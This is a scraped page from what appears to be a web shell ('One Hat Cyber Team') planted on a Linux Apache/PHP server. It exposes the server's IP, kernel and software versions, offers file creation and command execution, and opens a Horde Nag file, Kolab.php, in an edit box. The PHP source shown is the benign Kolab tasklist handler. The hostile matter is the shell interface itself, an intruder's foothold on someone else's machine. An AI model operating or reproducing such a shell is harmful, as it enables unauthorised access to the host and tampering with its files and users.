⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.50
Server IP:
41.128.143.86
Server:
Linux host.raqmix.cloud 6.8.0-1025-azure #30~22.04.1-Ubuntu SMP Wed Mar 12 15:28:20 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.3.23
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
psa-horde
/
nag
/
lib
/
Tasklists
/
Edit File: Kolab.php
<?php /** * The Kolab specific tasklists handler. * * See the enclosed file COPYING for license information (GPL). If you * did not receive this file, see http://www.horde.org/licenses/gpl. * * @author Gunnar Wrobel <wrobel@pardus.de> * @package Nag */ class Nag_Tasklists_Kolab extends Nag_Tasklists_Base { /** * Runs any actions after setting a new default tasklist. * * @param string $share The default share ID. */ public function setDefaultShare($share) { $tasklists = $this->_shares ->listShares( $this->_user, array('perm' => Horde_Perms::SHOW, 'attributes' => $this->_user)); foreach ($tasklists as $id => $tasklist) { if ($id == $share) { $tasklist->set('default', true); $tasklist->save(); break; } } } /** * Return the name of the default share. * * @return string The name of a default share. */ protected function _getDefaultShareName() { return _("Tasks"); } /** * Add any modifiers required to the share in order to mark it as default. * * @param Horde_Share_Object $share The new default share. */ protected function _prepareDefaultShare($share) { $share->set('default', true); } }
Simpan